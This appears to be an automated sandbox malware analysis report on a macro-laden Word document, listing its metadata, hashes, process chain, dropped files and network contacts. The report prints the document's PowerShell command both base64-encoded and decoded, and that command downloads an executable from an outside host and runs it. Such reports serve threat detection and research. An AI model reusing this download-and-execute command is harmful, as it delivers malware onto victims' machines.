File name: information-12.12.2018.doc

Full analysis: https://app.any.run/tasks/9e781954-be54-4097-abf1-e41b01b27144
Verdict: Malicious activity
Analysis date: June 10, 2024, 02:23:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Stand-alone context-sensitive neural-net, Subject: New Mexico Angie, Author: (115)383-0060, Comments: De-engineered incremental array, Template: Normal, Last Saved By: Windows, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 18:59:00 2018, Last Saved Time/Date: Wed Dec 12 10:08:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
MD5: FA4619AF566F8C5E31DB98D962099E30
SHA1: 16891AC247013FA6B2DCFEE76BD5483122A8747C
SHA256: 57CD3E0488EA7948A778B04DD2D7A16879F77C720CF536282EA0E3E0470C24A7
SSDEEP: 1536:azp0JcviaUp7v+vCyFZDZ3ObwwbM11vlCp2rgVPBxEPYmc69IJSa/To9b7/o:+Up7vNcubwwbM11vlCp2rgVPBxEPYmcn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3964)
    • Microsoft Office executes commands via PowerShell or Cmd

      • WINWORD.EXE (PID: 3964)
    • Unusual execution from MS Office

      • WINWORD.EXE (PID: 3964)
  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 1116)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 1116)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1116)
    • Runs shell command (SCRIPT)

      • WINWORD.EXE (PID: 3964)
    • Reads the Internet Settings

      • powershell.exe (PID: 112)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 112)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 112)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: Russian
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: Stand-alone context-sensitive neural-net
Subject: New Mexico Angie
Author: (115)383-0060
Keywords: -
Comments: De-engineered incremental array
Template: Normal
LastModifiedBy: Пользователь Windows
Software: Microsoft Office Word
CreateDate: 2018:04:19 18:59:00
ModifyDate: 2018:12:12 10:08:00
Security: None
CodePage: Windows Cyrillic
Manager: Katharina Abernathy
Company: Lynch LLC Riley Brakus
Bytes: 23552
CharCountWithSpaces: 2
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 12
TotalEditTime: 3 minutes
Words: -
Characters: 2
Pages: 1
Paragraphs: 1
Lines: 1
No data.
All screenshots are available in the full report
Total processes: 38
Monitored processes: 3
Malicious processes: 1
Suspicious processes: 0

Behavior graph

Process chain: start > winword.exe > cmd.exe > powershell.exe

Process information

PID: 112
CMD: poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBwAGkAdgBhAGMAdAB1AGIAbQBpAC4AYwBvAG0ALwB0AHkAYwBsAGEAbQAvAGYAcgBlAHMAcwByAC4AcABoAHAAPwBsAD0AYwByAGUAYgA3AC4AdABrAG4AIgAsACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIAArACAAJwBcADQAYgA5AGMAMgBlADgAYwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwANABiADkAYwAyAGUAOABjAC4AZQB4AGUAJwA7ACAARQB4AGkAdAA=
Decoded -ec argument (base64 of UTF-16LE text): (New-Object System.Net.WebClient).DownloadFile("http://pivactubmi.com/tyclam/fressr.php?l=creb7.tkn", $env:APPDATA + '\4b9c2e8c.exe');Start-Process $env:APPDATA'\4b9c2e8c.exe'; Exit
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1116
CMD: cMd.EXE /c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBwAGkAdgBhAGMAdAB1AGIAbQBpAC4AYwBvAG0ALwB0AHkAYwBsAGEAbQAvAGYAcgBlAHMAcwByAC4AcABoAHAAPwBsAD0AYwByAGUAYgA3AC4AdABrAG4AIgAsACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIAArACAAJwBcADQAYgA5AGMAMgBlADgAYwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwANABiADkAYwAyAGUAOABjAC4AZQB4AGUAJwA7ACAARQB4AGkAdAA=
(The -ec argument is identical to the one passed to PID 112.)
Path: C:\Windows\System32\cmd.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 3964
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n C:\Users\admin\Desktop\information-12.12.2018.doc
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
Total events: 9 251
Read events: 8 378
Write events: 558
Delete events: 315

Modification events

(PID) Process: (3964) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: r1?
Value: 72313F007C0F0000010000000000000000000000

(PID) Process: (3964) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write (nine separate events, one per name)
Names: 1033, 1041, 1046, 1036, 1031, 1040, 1049, 3082, 1042
Value: Off (for each name)
Executable files: 1
Suspicious files: 10
Text files: 0
Unknown types: 0

Dropped files

PID | Process | Filename | Type
3964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3172.tmp.cvr | -
MD5:
SHA256:
112 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ske02m2p.zwp.ps1 | binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
112 | powershell.exe | C:\Users\admin\AppData\Local\Temp\fkh5sdml.k5i.psm1 | binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
3964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF72E0EDAB0B340246.TMP | binary
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
112 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
3964 | WINWORD.EXE | C:\Users\admin\Desktop\~$formation-12.12.2018.doc | binary
MD5: DD44F00318FFDF44A070068814A9B43C
SHA256: D40974CFB620F7D9E584E6183EE7F7F55E621938037E8E097EFEE319213BEA69
3964 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text
MD5: 31DB69C6C6B4F550C7F10575BA783615
SHA256: C683EDDA7F445097FDF9915BF2805CBD5E635BB28D0C8B93A320EEF547B75232
3964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{82EDF140-E1EE-4BA1-9461-11B643707B96}.tmp | binary
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
3964 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\information-12.12.2018.doc.LNK | binary
MD5: 18483CEE4C9BE93B98615FADAFCFAA46
SHA256: B16D612B0BEE2943293B10341B4135FCED30AFFDD14D4FA3C3354237B4A74E3D
3964 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | binary
MD5: D27D307C9620F0F2B78519B6F5CB7294
SHA256: 8A5E3EC0A17A150FA69946625208F77546C15E5247A4A318EE1F7ADA644FFCF5
HTTP(S) requests: 0
TCP/UDP connections: 5
DNS requests: 1
Threats: 0

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 224.0.0.252:5355 | - | - | - | unknown
1088 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
112 | powershell.exe | 49.13.77.253:80 | pivactubmi.com | Hetzner Online GmbH | DE | unknown

DNS requests

Domain | IP | Reputation
pivactubmi.com | 49.13.77.253 | unknown

Threats

No threats detected
No debug info